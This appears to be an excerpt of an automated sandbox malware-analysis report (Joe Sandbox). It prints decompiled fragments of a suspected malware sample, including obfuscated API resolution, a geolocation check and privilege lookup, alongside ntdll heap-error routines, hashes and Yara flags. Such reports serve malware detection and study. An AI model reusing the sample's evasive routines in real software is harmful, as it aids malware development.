                                                    0x00409913
                                                    0x00000000
                                                    0x0040991e
                                                    0x004098fa
                                                    0x00409926

                                                    APIs
                                                    • PostThreadMessageW.USER32(000081AE,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098F6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_P5348574_74676.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: 7b07a314828948d52822fcdb3d0547e717b50667b0a4eb79118b390bfcbb0459
                                                    • Instruction ID: 97372187852fa5e1adf49ca0e465a128001ac0af3e8014b44584ab3ce766e153
                                                    • Opcode Fuzzy Hash: 7b07a314828948d52822fcdb3d0547e717b50667b0a4eb79118b390bfcbb0459
                                                    • Instruction Fuzzy Hash: 95019B71A8031876E7216691DC42FEF776C9B44B54F54012DFF047A1C2D6E8AA0587E9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E9C5 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 431 41e9c5-41e9d0 432 41e9b3-41e9c3 431->432 433 41e9d2-41e9ed call 41f1b3 431->433 435 41e9f2-41ea07 LookupPrivilegeValueW 433->435
                                                    C-Code - Quality: 64%
                                                    			E0041E9C5(void* __eax, void* __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr _v117;
				int _t16;

				asm("o16 fstp tword [esi-0x25de8b42]");
				asm("loop 0xffffffe3");
				ss = _v117;
				_t13 = _a4;
				E0041F1B3( *((intOrPtr*)(_a4 + 0x764)), _t13, _t13 + 0xab8,  *((intOrPtr*)(_a4 + 0x764)), 0, 0x46);
				_t16 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t16;
			}





                                                    0x0041e9c9
                                                    0x0041e9d0
                                                    0x0041e9d2
                                                    0x0041e9d6
                                                    0x0041e9ed
                                                    0x0041ea03
                                                    0x0041ea07

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FE95,0040FE95,?,00000000,?,?), ref: 0041EA03
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_P5348574_74676.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 6f107fde87a0e8a750ff240edea467a3f14f8b87ff78edc713b099ff39960363
                                                    • Instruction ID: 0263855f051aa3e283c50ba551ccbdc2edf87f179c8fe257d40e8d7a90bbd0ca
                                                    • Opcode Fuzzy Hash: 6f107fde87a0e8a750ff240edea467a3f14f8b87ff78edc713b099ff39960363
                                                    • Instruction Fuzzy Hash: 07F06DB6604204BFCB20DF99DC81EEB77A9EF88754F108559FD4C97281C636E811CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E865 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 443 41e865-41e88a call 41f1b3 445 41e88f-41e8a4 RtlFreeHeap 443->445
                                                    C-Code - Quality: 72%
                                                    			E0041E865(intOrPtr __eax, void* __ebx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				void* _v117;
				char _t17;

				asm("lds ebp, [esi]");
				 *0x9cc116e9 = __eax;
				 *__edi =  *__edi - __ebx +  *((intOrPtr*)(__esi - 0x2d));
				_t14 = _a4;
				_push(__esi);
				_t8 = _t14 + 0xaa0; // 0xaa0
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t14, _t8,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t17 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t17;
			}





                                                    0x0041e868
                                                    0x0041e86a
                                                    0x0041e86f
                                                    0x0041e876
                                                    0x0041e87c
                                                    0x0041e882
                                                    0x0041e88a
                                                    0x0041e8a0
                                                    0x0041e8a4

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,9F072898,00000000,?), ref: 0041E8A0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_P5348574_74676.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: b94de72b573e1966a3b4a1d5ffd8d631a89efd798ee2835b689f99938b8a0aac
                                                    • Instruction ID: db7fe254e23705c02db2d6c613c9e7060c507d673460d2e0dd7a4286191a99f8
                                                    • Opcode Fuzzy Hash: b94de72b573e1966a3b4a1d5ffd8d631a89efd798ee2835b689f99938b8a0aac
                                                    • Instruction Fuzzy Hash: 79F08CB1640205AFCB14DF69CC45EEB7BA9EF89344F14455AF98897282D231D815CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00410043 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E00410043(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E004195B3(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                    0x0041005d
                                                    0x00410067
                                                    0x0041006d
                                                    0x0041007c
                                                    0x0041006a
                                                    0x0041006a
                                                    0x0041006a

                                                    APIs
                                                    • GetUserGeoID.KERNELBASE(00000010), ref: 0041006D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_P5348574_74676.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: User
                                                    • String ID:
                                                    • API String ID: 765557111-0
                                                    • Opcode ID: 6840ff3954171594db79a7b87b7635f560bde1a2aabe693af1b59c88e19e6c7a
                                                    • Instruction ID: ada836e890b82e0dd553c32112272efd72bacd2a7c40ed4153c4fba82fb23b99
                                                    • Opcode Fuzzy Hash: 6840ff3954171594db79a7b87b7635f560bde1a2aabe693af1b59c88e19e6c7a
                                                    • Instruction Fuzzy Hash: 13E0C27368030466FA2091A59C42FB6364F5B84B00F048475F90CE62C2D5A8E8C00018
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E873 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0041E873(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xaa0; // 0xaa0
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                    0x0041e882
                                                    0x0041e88a
                                                    0x0041e8a0
                                                    0x0041e8a4

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,9F072898,00000000,?), ref: 0041E8A0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_P5348574_74676.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                    • Instruction ID: 1886f6a66617dfe5414ac9ff53834b0e5857080f48b025a3e0b38d79a8bd7b6d
                                                    • Opcode Fuzzy Hash: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                    • Instruction Fuzzy Hash: 10E012B2200208ABCB14EF89DC49EA737ACAF88754F018059BE095B282C630E914CAF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E833 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0041E833(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                    0x0041e842
                                                    0x0041e84a
                                                    0x0041e860
                                                    0x0041e864

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00418C69,?,00419410,00419410,?,00418C69,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E860
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_P5348574_74676.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                    • Instruction ID: df2cfb87f9ff2096fd868703bf6a6fcec91ae6a8f85b57d06528ce7919eb225c
                                                    • Opcode Fuzzy Hash: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                    • Instruction Fuzzy Hash: 36E012B2210208ABCB14EF89DC45EA737ACAF88664F018059BE085B242C630F9148AF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E9D3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0041E9D3(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F1B3( *((intOrPtr*)(_a4 + 0x764)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x764)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                    0x0041e9ed
                                                    0x0041ea03
                                                    0x0041ea07

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FE95,0040FE95,?,00000000,?,?), ref: 0041EA03
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_P5348574_74676.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: e363481e85907f674112753f3c70bf454170a1c5c2cc0076f0ceacd14441f91a
                                                    • Instruction ID: 942ffc3d2e0f3bdfb5ddf09c923354268ae6cb2a01bd98db3201c95a286cb933
                                                    • Opcode Fuzzy Hash: e363481e85907f674112753f3c70bf454170a1c5c2cc0076f0ceacd14441f91a
                                                    • Instruction Fuzzy Hash: D6E01AB1600304ABC710DF49CC45EE737ADEF88654F014065BE0D57242C635F8148AF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6ac3ade02f3fb931aaf3d8585ec8c9e8a9d1b4b87920837e46563a69abda5623
                                                    • Instruction ID: 9e7ee52535696e215f35feeadd9b116418b19e0bdb4a0ebcabc2c320c5a070e4
                                                    • Opcode Fuzzy Hash: 6ac3ade02f3fb931aaf3d8585ec8c9e8a9d1b4b87920837e46563a69abda5623
                                                    • Instruction Fuzzy Hash: 99B02B718010C4C5D602D3E00A08717BA007BC0300F12C011E3020350B8378C080F1B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 0186B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    • read from, xrefs: 0186B4AD, 0186B4B2
                                                    • *** enter .exr %p for the exception record, xrefs: 0186B4F1
                                                    • The instruction at %p tried to %s , xrefs: 0186B4B6
                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0186B3D6
                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0186B47D
                                                    • This failed because of error %Ix., xrefs: 0186B446
                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0186B476
                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0186B305
                                                    • The resource is owned exclusively by thread %p, xrefs: 0186B374
                                                    • *** enter .cxr %p for the context, xrefs: 0186B50D
                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0186B323
                                                    • Go determine why that thread has not released the critical section., xrefs: 0186B3C5
                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0186B484
                                                    • The resource is owned shared by %d threads, xrefs: 0186B37E
                                                    • *** Inpage error in %ws:%s, xrefs: 0186B418
                                                    • an invalid address, %p, xrefs: 0186B4CF
                                                    • *** then kb to get the faulting stack, xrefs: 0186B51C
                                                    • <unknown>, xrefs: 0186B27E, 0186B2D1, 0186B350, 0186B399, 0186B417, 0186B48E
                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0186B53F
                                                    • The instruction at %p referenced memory at %p., xrefs: 0186B432
                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 0186B48F
                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0186B39B
                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0186B2F3
                                                    • write to, xrefs: 0186B4A6
                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0186B38F
                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0186B2DC
                                                    • The critical section is owned by thread %p., xrefs: 0186B3B9
                                                    • a NULL pointer, xrefs: 0186B4E0
                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0186B314
                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 0186B352
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                    • API String ID: 0-108210295
                                                    • Opcode ID: 846527bda45371e738e0f21d3cb8078573a70c593b44450199543f5efe2f6397
                                                    • Instruction ID: c91575b8f9fb21429d81f43f3b6998e677019f20a6a5406aad2e712c6c4b3e2b
                                                    • Opcode Fuzzy Hash: 846527bda45371e738e0f21d3cb8078573a70c593b44450199543f5efe2f6397
                                                    • Instruction Fuzzy Hash: 588156B1B00204FFDB319A4ADC95DBF7B69EF96759F800158F604EB112D6608741CBB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01871C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 44%
                                                    			E01871C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x17948a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017BB150();
				} else {
					E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x18a589c);
				E017BB150("Heap error detected at %p (heap handle %p)\n",  *0x18a58a0);
				_t27 =  *0x18a5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01871E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017BB150();
				} else {
					E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E017BB150("Error code: %d - %s\n",  *0x18a5898);
				_t113 =  *0x18a58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017BB150();
					} else {
						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017BB150("Parameter1: %p\n",  *0x18a58a4);
				}
				_t115 =  *0x18a58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017BB150();
					} else {
						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017BB150("Parameter2: %p\n",  *0x18a58a8);
				}
				_t117 =  *0x18a58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017BB150();
					} else {
						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017BB150("Parameter3: %p\n",  *0x18a58ac);
				}
				_t119 =  *0x18a58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017BB150();
					} else {
						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x18a58b4);
					E017BB150("Last known valid blocks: before - %p, after - %p\n",  *0x18a58b0);
				} else {
					_t120 =  *0x18a58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017BB150();
				} else {
					E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E017BB150("Stack trace available at %p\n", 0x18a58c0);
			}











                                                    0x01871c10
                                                    0x01871c16
                                                    0x01871c1e
                                                    0x01871c3d
                                                    0x01871c3e
                                                    0x01871c20
                                                    0x01871c35
                                                    0x01871c3a
                                                    0x01871c44
                                                    0x01871c55
                                                    0x01871c5a
                                                    0x01871c65
                                                    0x01871c67
                                                    0x00000000
                                                    0x01871c6e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01871c67
                                                    0x01871cdc
                                                    0x01871ce5
                                                    0x01871d04
                                                    0x01871d05
                                                    0x01871ce7
                                                    0x01871cfc
                                                    0x01871d01
                                                    0x01871d0b
                                                    0x01871d17
                                                    0x01871d1f
                                                    0x01871d25
                                                    0x01871d30
                                                    0x01871d4f
                                                    0x01871d50
                                                    0x01871d32
                                                    0x01871d47
                                                    0x01871d4c
                                                    0x01871d61
                                                    0x01871d67
                                                    0x01871d68
                                                    0x01871d6e
                                                    0x01871d79
                                                    0x01871d98
                                                    0x01871d99
                                                    0x01871d7b
                                                    0x01871d90
                                                    0x01871d95
                                                    0x01871daa
                                                    0x01871db0
                                                    0x01871db1
                                                    0x01871db7
                                                    0x01871dc2
                                                    0x01871de1
                                                    0x01871de2
                                                    0x01871dc4
                                                    0x01871dd9
                                                    0x01871dde
                                                    0x01871df3
                                                    0x01871df9
                                                    0x01871dfa
                                                    0x01871e00
                                                    0x01871e0a
                                                    0x01871e13
                                                    0x01871e32
                                                    0x01871e33
                                                    0x01871e15
                                                    0x01871e2a
                                                    0x01871e2f
                                                    0x01871e39
                                                    0x01871e4a
                                                    0x01871e02
                                                    0x01871e02
                                                    0x01871e08
                                                    0x00000000
                                                    0x00000000
                                                    0x01871e08
                                                    0x01871e5b
                                                    0x01871e7a
                                                    0x01871e7b
                                                    0x01871e5d
                                                    0x01871e72
                                                    0x01871e77
                                                    0x01871e95

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                    • API String ID: 0-2897834094
                                                    • Opcode ID: 87edececd02c91c3980d13aac3944e6d1d8ca9d7e4e4e3bd3a541ed8d3c5f9aa
                                                    • Instruction ID: 93a618daeb3c70b22edd3d28f1908a0f68b43e2451dec82cf416f24f681170a8
                                                    • Opcode Fuzzy Hash: 87edececd02c91c3980d13aac3944e6d1d8ca9d7e4e4e3bd3a541ed8d3c5f9aa
                                                    • Instruction Fuzzy Hash: 5861F933529149DFD721AB89D4DDE25F7A8E744B30749813EF9099BB01DB24DE808F4A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017DA309 Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E017DA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x18a8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E017DA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E017DDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E017B9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
